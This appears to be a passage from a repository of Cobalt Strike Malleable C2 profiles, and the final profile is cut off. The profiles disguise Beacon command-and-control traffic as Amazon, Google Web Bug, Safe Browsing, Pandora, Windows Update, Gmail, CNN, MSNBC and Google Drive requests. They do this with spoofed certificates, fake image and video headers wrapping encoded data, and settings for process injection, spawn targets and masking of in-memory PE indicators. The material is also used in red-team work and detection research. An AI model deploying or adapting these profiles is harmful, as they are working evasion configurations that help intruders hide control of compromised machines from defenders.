"a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Content-Encoding" "gzip"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/N4215/adj/amzn.us.sr.aps"; 47 | 48 | client { 49 | 50 | header "Accept" "*/*"; 51 | header "Content-Type" "text/xml"; 52 | header "X-Requested-With" "XMLHttpRequest"; 53 | header "Host" "www.amazon.com"; 54 | 55 | parameter "sz" "160x600"; 56 | parameter "oe" "oe=ISO-8859-1;"; 57 | 58 | id { 59 | parameter "sn"; 60 | } 61 | 62 | parameter "s" "3717"; 63 | parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | 71 | server { 72 | 73 | header "Server" "Server"; 74 | header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT"; 75 | header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 76 | header "X-Frame-Options" "SAMEORIGIN"; 77 | header "x-ua-compatible" "IE=edge"; 78 | 79 | output { 80 | print; 81 | } 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /normal/webbug_getonly.profile: -------------------------------------------------------------------------------- 1 | # make our C2 look like a Google Web Bug 2 | # https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting 3 | # 4 | # Author: @armitagehacker 5 | 6 | set sleeptime "5000"; 7 | 8 | http-get { 9 | set uri "/___utm.gif"; 10 | client { 11 | parameter "utmac" "UA-2202604-2"; 12 | parameter "utmcn" "1"; 13 | parameter "utmcs" "ISO-8859-1"; 14 | parameter "utmsr" "1280x1024"; 15 | parameter "utmsc" "32-bit"; 16 | parameter "utmul" "en-US"; 17 | 18 | metadata { 19 | base64url; 20 | prepend "__utma"; 21 | parameter "utmcc"; 22 | } 23 | } 24 | 25 | server { 26 | header "Content-Type" "image/gif"; 27 | 28 | output { 29 | # hexdump pixel.gif 30 | # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 31 | # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 32 | # 0000020 01 00 01 00 00 02 01 44 00 3b 33 | prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; 34 | prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; 35 | prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; 36 | 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | set uri "/__utm.gif"; 44 | set verb "GET"; 45 | client { 46 | id { 47 | prepend "UA-220"; 48 | append "-2"; 49 | parameter "utmac"; 50 | } 51 | 52 | parameter "utmcn" "1"; 53 | parameter "utmcs" "ISO-8859-1"; 54 | parameter "utmsr" "1280x1024"; 55 | parameter "utmsc" "32-bit"; 56 | parameter "utmul" "en-US"; 57 | 58 | output { 59 | base64url; 60 | prepend "__utma"; 61 | parameter "utmcc"; 62 | } 63 | } 64 | 65 | server { 66 | header "Content-Type" "image/gif"; 67 | 68 | output { 69 | prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; 70 | prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; 71 | prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; 72 | print; 73 | } 74 | } 75 | } 76 | 77 | # dress up the staging process too 78 | http-stager { 79 | set uri_x86 "/_init.gif"; 80 | set uri_x64 "/__init.gif"; 81 | 82 | server { 83 | header "Content-Type" "image/gif"; 84 | 85 | output { 86 | prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; 87 | prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; 88 | prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; 89 | print; 90 | } 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /normal/safebrowsing.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Safebrowsing Comms profile 3 | # https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # Use a 30s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 12 | 13 | http-get { 14 | 15 | # change/randomize this as you wish 16 | set uri "/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2"; 17 | 18 | client { 19 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 20 | header "Accept-Language" "en-US,en;q=0.5"; 21 | header "Accept-Encoding" "gzip, deflate"; 22 | 23 | metadata { 24 | netbios; 25 | prepend "PREF=ID="; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/vnd.google.safebrowsing-chunk"; 32 | header "X-Content-Type-Options" "nosniff"; 33 | header "Content-Encoding" "gzip"; 34 | header "X-XSS-Protection" "1; mode=block"; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Cache-Control" "public,max-age=172800"; 37 | header "Age" "1222"; 38 | header "Alternate-Protocol" "80:quic"; 39 | 40 | output { 41 | print; 42 | } 43 | } 44 | } 45 | 46 | http-post { 47 | 48 | set uri "/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4"; 49 | 50 | client { 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US,en;q=0.5"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | 55 | id { 56 | netbios; 57 | prepend "U=779b64e1a7ed737a"; 58 | prepend "PREF=ID="; 59 | header "Cookie"; 60 | } 61 | 62 | output { 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | header "Content-Type" "application/vnd.google.safebrowsing-chunk"; 69 | header "X-Content-Type-Options" "nosniff"; 70 | header "Content-Encoding" "gzip"; 71 | header "X-XSS-Protection" "1; mode=block"; 72 | header "X-Frame-Options" "SAMEORIGIN"; 73 | header "Cache-Control" "public,max-age=172800"; 74 | header "Age" "1222"; 75 | header "Alternate-Protocol" "80:quic"; 76 | output { 77 | print; 78 | } 79 | } 80 | } 81 | 82 | -------------------------------------------------------------------------------- /normal/pandora.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Standard Pandora traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "1000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/access/"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "GetContentFeatures.DLNA.ORG" "1"; 20 | header "Host" "audio-sv5-t1-3.pandora.com"; 21 | header "Cookie" " __utma=210077622.1732439995.1433201462.1403204372.1385202493.2;"; 22 | 23 | parameter "version" "4"; 24 | parameter "lid" "1582502724"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "token"; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Server" "Apache"; 35 | header "Cache-Control" "no-cache, no-store, must-revalidate, max-age=-1"; 36 | header "Pragma" "no-cache, no-store"; 37 | #header "Expires" "-1"; 38 | header "Connection" "close"; 39 | header "Content-Type" "audio/mp4"; 40 | 41 | output { 42 | 43 | # mp4 header 44 | # 0000000: 0000 001c 6674 7970 6d70 3432 0000 0001 ....ftypmp42.... 45 | # 0000010: 4d34 5620 6d70 3432 6973 6f6d 0001 6fd9 M4V mp42isom..o. 46 | 47 | prepend "\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64"; 48 | prepend "\x4d\x34\x56\x20\x6d\x70\x34\x32\x69\x73\x6f\x6d\x00\x01\x6f\xd9"; 49 | prepend "\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x01"; 50 | 51 | print; 52 | } 53 | } 54 | } 55 | 56 | http-post { 57 | 58 | set uri "/radio/xmlrpc/v35"; 59 | 60 | client { 61 | 62 | header "Accept" "*/*"; 63 | header "Content-Type" "text/xml"; 64 | header "X-Requested-With" "XMLHttpRequest"; 65 | header "Host" "www.pandora.com"; 66 | 67 | id { 68 | parameter "rid"; 69 | } 70 | 71 | parameter "lid" "1582502724"; 72 | parameter "method" "getSearchRecommendations"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | 80 | server { 81 | 82 | header "Content-Type" "text/xml"; 83 | header "Cache-Control" "no-cache, no-store, no-transform, must-revalidate, max-age=0"; 84 | header "Expires" "-1"; 85 | header "Vary" "Accept-Encoding"; 86 | header "Content-Encoding" "gzip"; 87 | 88 | output { 89 | print; 90 | } 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /normal/microsoftupdate_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Microsoft Update 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | #information assumed based on other Microsoft certs 9 | https-certificate { 10 | set CN "www.windowsupdate.com"; #Common Name 11 | set O "Microsoft Corporation"; #Organization Name 12 | set C "US"; #Country 13 | set L "Redmond"; #Locality 14 | set OU "Microsoft IT"; #Organizational Unit Name 15 | set ST "WA"; #State or Province 16 | set validity "365"; #Number of days the cert is valid for 17 | } 18 | 19 | #default Beacon sleep duration and jitter 20 | set sleeptime "60000"; 21 | set jitter "20"; 22 | 23 | #default useragent for HTTP comms 24 | set useragent "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40"; 25 | 26 | #IP address used to indicate no tasks are available to DNS Beacon 27 | set dns_idle "8.8.4.4"; 28 | 29 | #Force a sleep prior to each individual DNS request. (in milliseconds) 30 | set dns_sleep "0"; 31 | 32 | #Maximum length of hostname when uploading data over DNS (0-255) 33 | set maxdns "235"; 34 | 35 | http-get { 36 | 37 | set uri "/c/msdownload/update/others/2016/12/29136388_"; 38 | 39 | client { 40 | 41 | header "Accept" "*/*"; 42 | header "Host" "download.windowsupdate.com"; 43 | 44 | #session metadata 45 | metadata { 46 | base64url; 47 | append ".cab"; 48 | uri-append; 49 | } 50 | } 51 | 52 | 53 | server { 54 | header "Content-Type" "application/vnd.ms-cab-compressed"; 55 | header "Server" "Microsoft-IIS/8.5"; 56 | header "MSRegion" "N. America"; 57 | header "Connection" "keep-alive"; 58 | header "X-Powered-By" "ASP.NET"; 59 | 60 | #Beacon's tasks 61 | output { 62 | 63 | print; 64 | } 65 | } 66 | } 67 | 68 | http-post { 69 | 70 | set uri "/c/msdownload/update/others/2016/12/3215234_"; 71 | set verb "GET"; 72 | 73 | client { 74 | 75 | header "Accept" "*/*"; 76 | 77 | #session ID 78 | id { 79 | prepend "download.windowsupdate.com/c/"; 80 | header "Host"; 81 | } 82 | 83 | 84 | #Beacon's responses 85 | output { 86 | base64url; 87 | append ".cab"; 88 | uri-append; 89 | } 90 | } 91 | 92 | server { 93 | header "Content-Type" "application/vnd.ms-cab-compressed"; 94 | header "Server" "Microsoft-IIS/8.5"; 95 | header "MSRegion" "N. America"; 96 | header "Connection" "keep-alive"; 97 | header "X-Powered-By" "ASP.NET"; 98 | 99 | #empty 100 | output { 101 | print; 102 | } 103 | } 104 | } 105 | 106 | #change the stager server 107 | http-stager { 108 | server { 109 | header "Content-Type" "application/vnd.ms-cab-compressed"; 110 | } 111 | } 112 | -------------------------------------------------------------------------------- /normal/gmail.profile: -------------------------------------------------------------------------------- 1 | # Make requests look like GMail web requests 2 | # 3 | # Author: @ChrisTruncer 4 | 5 | https-certificate { 6 | set CN "gmail.com"; 7 | set O "Google GMail"; 8 | set C "US"; 9 | set L "Mountain View"; 10 | set OU "Google Mail"; 11 | set ST "CA"; 12 | set validity "365"; 13 | } 14 | 15 | set sleeptime "60000"; 16 | set pipename "interprocess_##"; 17 | set spawnto "userinit.exe"; 18 | set jitter "15"; 19 | set dns_idle "8.8.4.4"; 20 | 21 | http-get { 22 | set uri "/_/scs/mail-static/_/js/"; 23 | client { 24 | 25 | metadata { 26 | base64; 27 | prepend "OSID="; 28 | header "Cookie"; 29 | } 30 | 31 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 32 | header "Accept-Language" "en-US,en;q=0.5"; 33 | header "Accept-Encoding" "gzip, deflate"; 34 | header "DNT" "1"; 35 | } 36 | 37 | server { 38 | header "X-Content-Type-Options" "nosniff"; 39 | header "X-Frame-Options" "SAMEORIGIN"; 40 | header "Cache-Control" "public, max-age=31536000"; 41 | header "X-XSS-Protection" "1; mode=block"; 42 | header "Server" "GSE"; 43 | header "Alternate-Protocol" "443:quic,p=1"; 44 | 45 | output{ 46 | prepend "try("; 47 | prepend "O(L.Oa(),\"sy580\")"; 48 | prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");"; 49 | prepend ")catch(e)(_DumpException(e))"; 50 | prepend "try("; 51 | prepend "O(L.Oa(),\"sy558\");"; 52 | prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");"; 53 | prepend ")catch(e)(_DumpException(e))"; 54 | prepend "try("; 55 | 56 | append "var f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)"; 57 | append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"sy588\")"; 58 | 59 | print; 60 | 61 | } 62 | } 63 | } 64 | 65 | http-post { 66 | set uri "/mail/u/0/"; 67 | client { 68 | parameter "ui" "d3244c4707"; 69 | parameter "hop" "6928632"; 70 | parameter "start" "0"; 71 | header "Content-Type" "application/x-www-form-urlencoded;charset=utf-8"; 72 | 73 | id { 74 | base64; 75 | prepend "OSID="; 76 | header "Cookie"; 77 | } 78 | 79 | output{ 80 | base64; 81 | print; 82 | } 83 | } 84 | 85 | server { 86 | header "X-Content-Type-Options" "nosniff"; 87 | header "X-Frame-Options" "SAMEORIGIN"; 88 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 89 | header "X-XSS-Protection" "1; mode=block"; 90 | header "Server" "GSE"; 91 | 92 | output { 93 | 94 | prepend "[[[\"apm\",\""; 95 | 96 | append "\"]"; 97 | append ",[\"ci\",[]"; 98 | append "]"; 99 | append ",[\"cm\",[]"; 100 | append ",[]"; 101 | append "]"; 102 | append "],'dbb8796a80d45e1f']"; 103 | 104 | print; 105 | } 106 | 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /normal/cnnvideo_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # CNN Video 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | # CNN doesnt have real cert, guessed details 9 | https-certificate { 10 | set CN "www.cnn.com"; #Common Name 11 | set O "Turner Broadcasting System Inc"; #Organization Name 12 | set C "US"; #Country 13 | set L "Atlanta"; #Locality 14 | set OU "MSS (Media Software & Services)"; #Organizational Unit Name 15 | set ST "GA"; #State or Province 16 | set validity "365"; #Number of days the cert is valid for 17 | } 18 | 19 | #default Beacon sleep duration and jitter 20 | set sleeptime "60000"; 21 | set jitter "20"; 22 | 23 | #default useragent for HTTP comms 24 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 25 | 26 | #IP address used to indicate no tasks are available to DNS Beacon 27 | set dns_idle "8.8.4.4"; 28 | 29 | #Force a sleep prior to each individual DNS request. (in milliseconds) 30 | set dns_sleep "0"; 31 | 32 | #Maximum length of hostname when uploading data over DNS (0-255) 33 | set maxdns "235"; 34 | 35 | http-get { 36 | 37 | set uri "/cnn/cnnx/dai/hds/stream_hd/1/cnnxlive1_4.bootstrap"; 38 | 39 | client { 40 | 41 | header "Host" "phds-live.cdn.turner.com"; 42 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 43 | header "Referer" "http://go.cnn.com/?stream=cnn&sr=watchHPbutton"; 44 | 45 | #session metadata 46 | metadata { 47 | base64url; 48 | parameter "g"; 49 | } 50 | 51 | parameter "hdcore" "3.4.1"; 52 | parameter "plugin" "aasp-3.4.1.1.1"; 53 | } 54 | 55 | 56 | server { 57 | 58 | 59 | header "Server" "ngx_openresty"; 60 | header "Content-Type" "application/octet-stream"; 61 | header "ETag" "dbbece0334279b5bfbf88c27bda56444"; 62 | header "Cache-Control" "max-age=1"; 63 | header "Connection" "keep-alive"; 64 | 65 | #Beacon's tasks 66 | output { 67 | 68 | print; 69 | } 70 | } 71 | } 72 | 73 | http-post { 74 | 75 | set uri "/cnn/cnnx/dai/hds/stream_hd/2/cnnxlive1_4.bootstrap"; 76 | set verb "GET"; 77 | 78 | client { 79 | 80 | header "Host" "phds-live.cdn.turner.com"; 81 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 82 | 83 | 84 | #session ID 85 | id { 86 | base64url; 87 | prepend "http://go.cnn.com/?stream=cnn&sr=watchHPbutton&token="; 88 | header "Referer"; 89 | } 90 | 91 | #Beacon's responses 92 | output { 93 | base64url; 94 | parameter "g"; 95 | } 96 | 97 | parameter "hdcore" "3.4.1"; 98 | parameter "plugin" "aasp-3.4.1.1.1"; 99 | } 100 | 101 | server { 102 | 103 | header "Server" "ngx_openresty"; 104 | header "Content-Type" "application/octet-stream"; 105 | header "ETag" "dbbece0334279b5bfbf88c27bda56444"; 106 | header "Cache-Control" "max-age=1"; 107 | header "Connection" "keep-alive"; 108 | 109 | #empty 110 | output { 111 | print; 112 | } 113 | } 114 | } 115 | 116 | #change the stager server 117 | http-stager { 118 | server { 119 | header "Content-Type" "application/octet-stream"; 120 | } 121 | } 122 | -------------------------------------------------------------------------------- /APT/meterpreter.profile: -------------------------------------------------------------------------------- 1 | # Meterpreter profile 2 | # 3 | # This was a fun exercise, make Beacon Meterpreter-like. :) 4 | # 5 | # https://www.metasploit.com/ 6 | # 7 | set sample_name "Meterpreter"; 8 | 9 | # 100ms sleep time. 10 | set sleeptime "100"; 11 | 12 | # what else would we spawn to? 13 | set spawnto_x86 "%windir%\\syswow64\\notepad.exe"; 14 | set spawnto_x64 "%windir%\\sysnative\\notepad.exe"; 15 | 16 | # process injection tweak 17 | set hijack_remote_thread "false"; 18 | 19 | # propagate user-agent to all transactions 20 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"; 21 | 22 | # set some PE and memory indicators to resemble the metasploit rDLL 23 | stage { 24 | # PE header fields 25 | set checksum "0"; 26 | set compile_time "08 May 2017 23:13:38"; 27 | set entry_point "558586"; 28 | set image_size_x86 "987136"; 29 | set image_size_x64 "1232896"; 30 | set name "metsrv.dll"; 31 | set rich_header "\xf4\x1f\x93\x1a\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xf6\x2f\x1c\x49\x9d\x7e\xfd\x49\xf6\x2f\x22\x49\xaf\x7e\xfd\x49\xf6\x2f\x1d\x49\x0b\x7e\xfd\x49\xcd\x07\x1d\x49\x3f\x7f\xfd\x49\xb0\x7e\xfc\x49\x63\x7e\xfd\x49\xb9\x06\x6e\x49\xa1\x7e\xfd\x49\xb9\x06\x7e\x49\xb1\x7e\xfd\x49\xbd\x2c\x22\x49\xb1\x7e\xfd\x49\xbd\x2c\x1d\x49\xaa\x7e\xfd\x49\xbd\x2c\x21\x49\xb1\x7e\xfd\x49\xbd\x2c\x23\x49\xb1\x7e\xfd\x49\x52\x69\x63\x68\xb0\x7e\xfd\x49\x00\x00\x00\x00\x00\x00\x00\x00"; 32 | 33 | # obfuscations 34 | set userwx "true"; 35 | set stomppe "false"; 36 | 37 | # strings 38 | stringw "%04x-%04x:%s"; 39 | stringw "pipe"; 40 | stringw "SeSecurityPrivilege"; 41 | stringw "pipe"; 42 | stringw "\\\\%s\\pipe\\%s"; 43 | stringw "https"; 44 | stringw "POST"; 45 | stringw "POST"; 46 | string "stdapi_sys_process_getpid"; 47 | string "[%x]"; 48 | string "buffer_from_file"; 49 | string "buffer_to_file"; 50 | string "channel_close"; 51 | string "channel_create"; 52 | 53 | # get rid of some stuff 54 | transform-x86 { 55 | strrep "beacon.dll" ""; 56 | } 57 | 58 | transform-x64 { 59 | strrep "beacon.x64.dll" ""; 60 | } 61 | } 62 | 63 | # SSL cert 64 | https-certificate { 65 | set O "dmcjna"; 66 | set CN "dmcjna"; 67 | set validity "3285"; 68 | } 69 | 70 | # staging process 71 | http-stager { 72 | server { 73 | header "Content-Type" "application/octet-stream"; 74 | header "Connection" "Keep-Alive"; 75 | header "Server" "Apache"; 76 | } 77 | } 78 | 79 | # HTTP GET 80 | http-get { 81 | set uri "/ucD"; 82 | 83 | client { 84 | header "Cache-Control" "no-cache"; 85 | header "Connection" "Keep-Alive"; 86 | header "Pragma" "no-cache"; 87 | 88 | metadata { 89 | base64url; 90 | uri-append; 91 | } 92 | } 93 | 94 | server { 95 | header "Content-Type" "application/octet-stream"; 96 | header "Connection" "Keep-Alive"; 97 | header "Server" "Apache"; 98 | 99 | output { 100 | print; 101 | } 102 | } 103 | } 104 | 105 | # HTTP POST 106 | http-post { 107 | set uri "/ucW"; 108 | 109 | client { 110 | header "Cache-Control" "no-cache"; 111 | header "Connection" "Keep-Alive"; 112 | header "Pragma" "no-cache"; 113 | 114 | id { 115 | base64url; 116 | append "UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ"; 117 | uri-append; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | # The server's response to our HTTP POST 126 | server { 127 | header "Content-Type" "application/octet-stream"; 128 | header "Connection" "Keep-Alive"; 129 | header "Server" "Apache"; 130 | 131 | # this will just print an empty string, meh... 132 | output { 133 | print; 134 | } 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /normal/msnbcvideo_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # MSNBC Live Video 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | 9 | #NOTE: As of writing, MSNBC doesn't support HTTS - these are made-up cert details based on nbc.com cert 10 | https-certificate { 11 | set CN "www.msnbc.com"; #Common Name 12 | set O "General Electric Company"; #Organization Name 13 | set C "US"; #Country 14 | set L "Fairfield"; #Locality 15 | set OU "Enterprise SSL Wildcard"; #Organizational Unit Name 16 | set ST "CT"; #State or Province 17 | set validity "365"; #Number of days the cert is valid for 18 | } 19 | 20 | #default Beacon sleep duration and jitter 21 | set sleeptime "1000"; 22 | set jitter "20"; 23 | 24 | #default useragent for HTTP comms 25 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 26 | 27 | #IP address used to indicate no tasks are available to DNS Beacon 28 | set dns_idle "8.8.4.4"; 29 | 30 | #Force a sleep prior to each individual DNS request. (in milliseconds) 31 | set dns_sleep "0"; 32 | 33 | #Maximum length of hostname when uploading data over DNS (0-255) 34 | set maxdns "235"; 35 | 36 | http-get { 37 | 38 | set uri "/z/msnbc2_live01@9615/manifest.f4m"; 39 | 40 | client { 41 | 42 | header "Host" "msnbc2prod-lh.akamaihd.net"; 43 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 44 | header "Referer" "http://player.theplatform.com/p/7wvmTC/NBCOnAirProdPlayer/embed/select?s=msnbc"; 45 | 46 | parameter "hdcore" "3.1"; 47 | 48 | #session metadata 49 | metadata { 50 | netbios; 51 | parameter "g"; 52 | } 53 | } 54 | 55 | 56 | server { 57 | 58 | header "Server" "AkamaiGHost"; 59 | header "Mime-Version" "1.0"; 60 | header "Content-Type" "video/abst"; 61 | header "Cache-Control" "max-age=0, no-cache"; 62 | header "Pragma" "no-cache"; 63 | header "Connection" "keep-alive"; 64 | header "Set-Cookie" "_alid_=RKs7UfhDqLr37whMpHIwBg==; path=/z/msnbc2_live01@9615/; domain=msnbc2prod-lh.akamaihd.net"; 65 | 66 | #Beacon's tasks 67 | output { 68 | 69 | print; 70 | } 71 | } 72 | } 73 | 74 | http-post { 75 | 76 | set uri "/z/msnbc2_live01@6915/manifest.f4m"; 77 | set verb "GET"; 78 | 79 | client { 80 | 81 | header "Host" "msnbc2prod-lh.akamaihd.net"; 82 | header "X-Requested-With" "ShockwaveFlash/24.0.0.186"; 83 | 84 | parameter "hdcore" "3.1"; 85 | 86 | #session ID 87 | id { 88 | netbios; 89 | base64url; 90 | parameter "g"; 91 | } 92 | 93 | #Beacon's responses 94 | output { 95 | base64url; 96 | prepend "http://player.theplatform.com/p/"; 97 | append "/NBCOnAirProdPlayer/embed/select?s=msnbc"; 98 | header "Referer"; 99 | } 100 | } 101 | 102 | server { 103 | 104 | header "Server" "AkamaiGHost"; 105 | header "Mime-Version" "1.0"; 106 | header "Content-Type" "video/abst"; 107 | header "Cache-Control" "max-age=0, no-cache"; 108 | header "Pragma" "no-cache"; 109 | header "Connection" "keep-alive"; 110 | header "Set-Cookie" "_alid_=RKs7UfhDqLr37whMpHIwBg==; path=/z/msnbc2_live01@6915/; domain=msnbc2prod-lh.akamaihd.net"; 111 | 112 | #empty 113 | output { 114 | print; 115 | } 116 | } 117 | } 118 | 119 | #change the stager server 120 | http-stager { 121 | server { 122 | header "Content-Type" "image/gif"; 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /normal/googledrive_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Google Drive 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | #set https cert info 8 | https-certificate { 9 | set CN "*.google.com"; #Common Name 10 | set O "Google Inc"; #Organization Name 11 | set C "US"; #Country 12 | set L "Mountain View"; #Locality 13 | set ST "California"; #State or Province 14 | set validity "365"; #Number of days the cert is valid for 15 | } 16 | 17 | #default Beacon sleep duration and jitter 18 | set sleeptime "60000"; 19 | set jitter "20"; 20 | 21 | #default useragent for HTTP comms 22 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 23 | 24 | #IP address used to indicate no tasks are available to DNS Beacon 25 | set dns_idle "8.8.4.4"; 26 | 27 | #Force a sleep prior to each individual DNS request. (in milliseconds) 28 | set dns_sleep "0"; 29 | 30 | #Maximum length of hostname when uploading data over DNS (0-255) 31 | set maxdns "235"; 32 | 33 | http-get { 34 | 35 | set uri "/viewerng/meta"; 36 | 37 | client { 38 | 39 | header "Accept" "text/html,application/xml;*/*;"; 40 | header "Accept-Encoding" "gzip, deflate"; 41 | header "Host" "drive.google.com"; 42 | header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;"; 43 | 44 | #session metadata 45 | metadata { 46 | base64url; 47 | netbios; 48 | base64url; 49 | parameter "id"; 50 | } 51 | 52 | parameter "u" "0"; 53 | } 54 | 55 | server { 56 | header "Content-Type" "application/json; charset=utf-8"; 57 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 58 | header "Pragma" "no-cache"; 59 | header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt"; 60 | header "X-Content-Type-Options" "nosniff"; 61 | header "X-Frame-Options" "SAMEORIGIN"; 62 | header "X-XSS-Protection" "1; mode=block"; 63 | header "Server" "GSE"; 64 | header "Connection" "close"; 65 | 66 | 67 | #Beacon's tasks 68 | output { 69 | print; 70 | } 71 | } 72 | } 73 | 74 | http-post { 75 | 76 | set uri "/viewersng/meta"; 77 | set verb "GET"; 78 | 79 | client { 80 | 81 | header "Accept" "text/html,application/xml;*/*;"; 82 | header "Accept-Encoding" "gzip, deflate"; 83 | header "Host" "drive.google.com"; 84 | header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;"; 85 | 86 | 87 | output { 88 | base64url; 89 | netbios; 90 | base64url; 91 | parameter "id"; 92 | } 93 | 94 | #session ID 95 | id { 96 | parameter "u"; 97 | } 98 | } 99 | 100 | server { 101 | header "Content-Type" "application/json; charset=utf-8"; 102 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 103 | header "Pragma" "no-cache"; 104 | header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt"; 105 | header "X-Content-Type-Options" "nosniff"; 106 | header "X-Frame-Options" "SAMEORIGIN"; 107 | header "X-XSS-Protection" "1; mode=block"; 108 | header "Server" "GSE"; 109 | header "Connection" "close"; 110 | 111 | 112 | output { 113 | print; 114 | } 115 | } 116 | } 117 | 118 | #change the stager server 119 | http-stager { 120 | server { 121 | header "Content-Type" "application/json; charset=utf-8"; 122 | header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate"; 123 | header "Pragma" "no-cache"; 124 | } 